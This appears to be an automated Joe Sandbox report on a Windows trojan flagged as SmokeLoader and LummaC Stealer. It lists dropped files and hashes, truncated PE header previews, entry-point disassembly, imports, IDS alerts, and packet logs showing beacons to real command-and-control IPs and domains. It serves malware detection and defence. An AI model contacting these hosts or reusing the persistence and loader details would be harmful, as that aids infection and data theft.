188.114.97.3 | mundoparachicas.space | European Union | 13335 | CLOUDFLARENETUS | false
58.151.148.90 | mzxn.ru | Korea Republic of | 17858 | POWERVIS-AS-KRLGPOWERCOMMKR | true
185.149.100.242 | mussangroup.com | Turkey | 209853 | VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1488759
Start date and time: 2024-08-06 14:47:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: n72I7qB2ss.exe (renamed because the original name is a hash value)
Original Sample Name: 0a37ce10735d313ff079296125f25ee90a74fdb5aa87d9b5f1642998c62cf05e.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/4@9/5
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:48:23 | API Interceptor | 531713x Sleep call for process: explorer.exe modified
08:49:07 | API Interceptor | 11x Sleep call for process: 70C1.exe modified
08:49:14 | API Interceptor | 11x Sleep call for process: AA31.exe modified
13:48:24 | Task Scheduler | Run new task: Firefox Default Browser Agent 342508018A16E33C path: C:\Users\user\AppData\Roaming\ashcvvs
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\70C1.exe | 3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exe | malicious | SmokeLoader
C:\Users\user\AppData\Local\Temp\70C1.exe | kMN7AGke8h.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader
C:\Users\user\AppData\Local\Temp\AA31.exe | 3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exe | malicious | SmokeLoader
C:\Users\user\AppData\Local\Temp\AA31.exe | kMN7AGke8h.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader
                          Process:C:\Windows\explorer.exe
                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                          Category:dropped
                          Size (bytes):2064896
                          Entropy (8bit):6.707727290324826
                          Encrypted:false
                          SSDEEP:49152:YH4XAU8bMoLZcZQCO/Vi2QYeuGHUsbCepRDmoMKdP8ub48f0jJvsMcpF3mXLq:G4PU2nxmozdUjJ7
                          MD5:2B113C0906841F9AEAAFBD43C7CD37C4
                          SHA1:BF8EAF8AFD8DF8531935B3152AF862AB204BBCA3
                          SHA-256:910E7F453F7842758E874A6AC98301F157E4EA6F9C6CA8A8E2AC0983D03D989B
                          SHA-512:486A5AC4F88818D3DD593723E076FADDD677676062415800E0D9BA8650AC0737F2DCE427AC34BAE1F681C54E3FDD253F28032BE707C305F4E7DFBBEBFA844C0D
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 32%
                          Joe Sandbox View:
                          • Filename: 3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exe, Detection: malicious
                          • Filename: kMN7AGke8h.exe, Detection: malicious
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...[a.f.................d...~...`.............@.............................P&.....*.....`... ...............................................&. ....0&.8........[...........@&.................................(.....................&.P............................text....c.......d..................`..`.data...0............h..............@....rdata..x....P.......0..............@..@.pdata...[.......\..................@..@.xdata..TG...P...H...(..............@..@.bss.....^...............................idata.. .....&......p..............@....CRT....X.....&......x..............@....tls......... &......z..............@....rsrc...8....0&......|..............@..@.reloc.......@&......~..............@..B........................................................................................................................................................................
                          Process:C:\Windows\explorer.exe
                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                          Category:modified
                          Size (bytes):2097152
                          Entropy (8bit):6.715421894829642
                          Encrypted:false
                          SSDEEP:49152:wv9EtY/18WmXsQyVOwJoNWu1vCHdrWTz+pmjjhnlQD38kF:uWm8sQF1vCMe
                          MD5:85B1854B81D15AC9116AA200304D7CA0
                          SHA1:0FE99B5F0DE3C371CC1E1C5688B5F04E9DAB038F
                          SHA-256:F1530D12529D8B0ED379457FEEE1A7CFC223596F455EA0D0771F414699BC88F5
                          SHA-512:663154AD674325045457DD5C68F75B4FC9CA61C205E704BBABC1F74BDE0DA39606515DBB30CBE40EEEFA1B2D99A964D0CAC5210D532BB05DDDF15B969F2E1BDB
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 54%
                          Joe Sandbox View:
                          • Filename: 3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exe, Detection: malicious
                          • Filename: kMN7AGke8h.exe, Detection: malicious
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....`.f.........................`.............@..............................&....... ...`... ...............................................&.H.....&.8....p...\............&............................. d..(.....................&.X............................text...H...........................`..`.data...............................@....rdata..............................@..@.pdata...\...p...^...H..............@..@.xdata..$G.......H..................@..@.bss.....^... ..........................idata..H.....&.....................@....CRT....X.....&.....................@....tls..........&.....................@....rsrc...8.....&.....................@..@.reloc........&.....................@..B........................................................................................................................................................................
                          Process:C:\Windows\explorer.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):215552
                          Entropy (8bit):5.654048426178871
                          Encrypted:false
                          SSDEEP:3072:tmLAnD4GokA3ZEUBSC6P0xcFlADN5Ld8Hi+Cx5Fj:ELAnsGokA36iwFlADNsLqj
                          MD5:A3F7B743EFAB28654F201A43A0E349C5
                          SHA1:58C7B963CBCDBF5837109E80693D77E32AC6D150
                          SHA-256:0A37CE10735D313FF079296125F25EE90A74FDB5AA87D9B5F1642998C62CF05E
                          SHA-512:C93DDA7FDFD93B990B3C963E664D11AB32B39F30D44B9FD7CCB270E79DC2D6EF3C4A16543DDB9801532969E6D95F378891C7BD5E6245500A724B28326401B62C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 71%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@..%..@v..@v..@v...v..@v...v$.@v...v..@v...vv.@v#.;v..@v..Av|.@v...v..@v...v..@v...v..@vRich..@v........PE..L...:P.e.................^...................p....@.........................................................................|...<.......8............................................................................p...............................text....].......^.................. ..`.rdata...#...p...$...b..............@..@.data...|&......."..................@....rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\explorer.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Reputation:high, very likely benign file
                          Preview:[ZoneTransfer]....ZoneId=0
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):5.654048426178871
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:n72I7qB2ss.exe
                          File size:215'552 bytes
                          MD5:a3f7b743efab28654f201a43a0e349c5
                          SHA1:58c7b963cbcdbf5837109e80693d77e32ac6d150
                          SHA256:0a37ce10735d313ff079296125f25ee90a74fdb5aa87d9b5f1642998c62cf05e
                          SHA512:c93dda7fdfd93b990b3c963e664d11ab32b39f30d44b9fd7ccb270e79dc2d6ef3c4a16543ddb9801532969e6d95f378891c7bd5e6245500a724b28326401b62c
                          SSDEEP:3072:tmLAnD4GokA3ZEUBSC6P0xcFlADN5Ld8Hi+Cx5Fj:ELAnsGokA36iwFlADNsLqj
                          TLSH:AD247CA17691D03DCC9B83F54E79E6A42736BC6157B1818F72A83F6F59332A006AD3C1
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@..%..@v..@v..@v...v..@v...v$.@v...v..@v...vv.@v#.;v..@v..Av|.@v...v..@v...v..@v...v..@vRich..@v........PE..L...:P.e...........
                          Icon Hash:738733b18b8b83cc
                          Entrypoint:0x40158e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x659A503A [Sun Jan 7 07:18:18 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:fd7107097d7d4c710186b83074e69309
                          Instruction
                          call 00007FD448808602h
                          jmp 00007FD44880487Eh
                          mov edi, edi
                          push ebp
                          mov ebp, esp
                          sub esp, 00000328h
                          mov dword ptr [0042BBF8h], eax
                          mov dword ptr [0042BBF4h], ecx
                          mov dword ptr [0042BBF0h], edx
                          mov dword ptr [0042BBECh], ebx
                          mov dword ptr [0042BBE8h], esi
                          mov dword ptr [0042BBE4h], edi
                          mov word ptr [0042BC10h], ss
                          mov word ptr [0042BC04h], cs
                          mov word ptr [0042BBE0h], ds
                          mov word ptr [0042BBDCh], es
                          mov word ptr [0042BBD8h], fs
                          mov word ptr [0042BBD4h], gs
                          pushfd
                          pop dword ptr [0042BC08h]
                          mov eax, dword ptr [ebp+00h]
                          mov dword ptr [0042BBFCh], eax
                          mov eax, dword ptr [ebp+04h]
                          mov dword ptr [0042BC00h], eax
                          lea eax, dword ptr [ebp+08h]
                          mov dword ptr [0042BC0Ch], eax
                          mov eax, dword ptr [ebp-00000320h]
                          mov dword ptr [0042BB48h], 00010001h
                          mov eax, dword ptr [0042BC00h]
                          mov dword ptr [0042BAFCh], eax
                          mov dword ptr [0042BAF0h], C0000409h
                          mov dword ptr [0042BAF4h], 00000001h
                          mov eax, dword ptr [0042A004h]
                          mov dword ptr [ebp-00000328h], eax
                          mov eax, dword ptr [0042A008h]
                          mov dword ptr [ebp-00000324h], eax
                          call dword ptr [000000B4h]
                          Programming Language:
                          • [C++] VS2008 build 21022
                          • [ASM] VS2008 build 21022
                          • [ C ] VS2008 build 21022
                          • [IMP] VS2005 build 50727
                          • [RES] VS2008 build 21022
                          • [LNK] VS2008 build 21022
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x28a7c | 0x3c | .rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3d000 | 0xa138 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x27000 | 0x198 | .rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x25d0c | 0x25e00 | b91f6c3e08c9da7e1278e74784c8e531 | False | 0.5483382322607261 | data | 5.857568734649549 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata | 0x27000 | 0x23a0 | 0x2400 | e86ec2cfd30a7a88c3cddd6e7f366398 | False | 0.3825954861111111 | data | 5.582207049351834 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data | 0x2a000 | 0x1267c | 0x2200 | 24dd15728c5f7e055bc300090138fcc6 | False | 0.18956801470588236 | data | 2.0612611945466455 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc | 0x3d000 | 0xa138 | 0xa200 | 6683b0dab82fa07587961b15ec5d6eb6 | False | 0.37635030864197533 | data | 4.5164695591334265 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_CURSOR | 0x42c40 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4276315789473684
                          RT_CURSOR | 0x42d88 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7368421052631579
                          RT_CURSOR | 0x42eb8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.06130705394190871
                          RT_CURSOR | 0x45488 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.31023454157782515
                          RT_ICON | 0x3d4c0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.363272921108742
                          RT_ICON | 0x3e368 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5685920577617328
                          RT_ICON | 0x3ec10 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.6203917050691244
                          RT_ICON | 0x3f2d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6640173410404624
                          RT_ICON | 0x3f840 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Turkish | Turkey | 0.4324688796680498
                          RT_ICON | 0x41de8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.5319672131147541
                          RT_ICON | 0x42770 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.5168439716312057
                          RT_STRING | 0x46528 | 0x66 | data | | | 0.6274509803921569
                          RT_STRING | 0x46590 | 0x1fc | data | | | 0.5039370078740157
                          RT_STRING | 0x46790 | 0x608 | data | | | 0.43976683937823835
                          RT_STRING | 0x46d98 | 0x14e | data | | | 0.5059880239520959
                          RT_STRING | 0x46ee8 | 0x1bc | data | | | 0.5247747747747747
                          RT_STRING | 0x470a8 | 0x90 | data | | | 0.6388888888888888
                          RT_GROUP_CURSOR | 0x42d70 | 0x14 | data | | | 1.15
                          RT_GROUP_CURSOR | 0x45460 | 0x22 | data | | | 1.088235294117647
                          RT_GROUP_CURSOR | 0x46330 | 0x14 | data | | | 1.25
                          RT_GROUP_ICON | 0x42bd8 | 0x68 | data | Turkish | Turkey | 0.7115384615384616
                          RT_VERSION | 0x46348 | 0x1e0 | data | | | 0.5833333333333334
                          DLL | Import
                          KERNEL32.dll | GetFullPathNameW, GlobalDeleteAtom, OpenJobObjectA, GetLogicalDriveStringsW, GetSystemWindowsDirectoryW, GetCommProperties, GetModuleHandleW, GetTickCount, GetCommandLineA, GetSystemTimes, GlobalAlloc, Sleep, FormatMessageW, DeleteVolumeMountPointW, HeapCreate, WriteConsoleW, VirtualUnlock, FlushInstructionCache, GetShortPathNameA, InterlockedExchange, GetProcAddress, SearchPathA, GetNumaHighestNodeNumber, OpenWaitableTimerA, GetAtomNameA, LoadLibraryA, SetCalendarInfoW, HeapLock, GetCurrentConsoleFont, SetCommMask, FoldStringW, GetDefaultCommConfigA, lstrcatW, FreeEnvironmentStringsW, EnumDateFormatsW, SetFileShortNameA, DebugBreak, GetLastError, HeapFree, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, ReadFile, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, FlushFileBuffers, CreateFileA, CloseHandle, GetModuleHandleA
                          USER32.dll | GetActiveWindow, IntersectRect
                          Language of compilation system | Country where language is spoken
                          Turkish | Turkey
                          Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                          2024-08-06T14:48:56.016106+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49752 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:48:30.928546+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49738 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:48:41.821298+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49744 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:51:34.618408+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49774 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:51:04.254415+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49768 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:50:20.438920+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49760 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:51:14.829048+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49770 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:48:37.059237+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49742 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:50:14.241484+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49759 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:48:35.534785+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49741 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:51:50.453126+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49777 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:48:39.509615+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49743 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:48:27.855659+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49736 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:50:41.269726+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49764 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:49:04.206062+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49756 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:48:50.165626+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49749 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:50:46.436979+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49765 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:51:45.563822+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49776 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:52:00.583525+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49779 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:50:59.094118+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49767 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:48:43.293459+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49745 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:51:55.337366+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49778 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:50:36.064848+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49763 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:51:29.791538+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49773 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:49:02.392745+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49755 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:50:25.754267+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49761 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:48:46.441446+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49747 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:50:30.907851+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49762 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:50:51.717674+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49766 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:48:29.414572+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49737 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:51:40.131887+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49775 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:48:33.946645+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49740 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:48:44.854879+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49746 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:51:19.867733+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49771 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:51:09.566965+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49769 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:51:24.926341+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49772 | 80 | 192.168.2.4 | 190.187.52.42
                          2024-08-06T14:48:32.419301+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49739 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:48:48.380629+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49748 | 80 | 192.168.2.4 | 58.151.148.90
                          2024-08-06T14:48:57.595341+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49753 | 80 | 192.168.2.4 | 58.151.148.90
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Aug 6, 2024 14:48:39.510396957 CEST4974380192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.512150049 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.515268087 CEST804974358.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:39.517013073 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:39.517124891 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.517291069 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.517313004 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:39.522280931 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:39.522794962 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.820534945 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.821219921 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.821297884 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.821331978 CEST4974480192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.824058056 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.827687979 CEST804974458.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.830267906 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.830355883 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.830480099 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.830612898 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:41.835875988 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:41.835889101 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.292944908 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.293409109 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.293458939 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.293504000 CEST4974580192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.298650026 CEST804974558.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.301692009 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.306659937 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.306761026 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.306885958 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.306912899 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:43.311724901 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:43.311989069 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.854724884 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.854823112 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.854878902 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.855010033 CEST4974680192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.857795954 CEST4974780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.859831095 CEST804974658.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.862808943 CEST804974758.151.148.90192.168.2.4
                          Aug 6, 2024 14:48:44.862900019 CEST4974780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.863045931 CEST4974780192.168.2.458.151.148.90
                          Aug 6, 2024 14:48:44.863070965 CEST4974780192.168.2.458.151.148.90
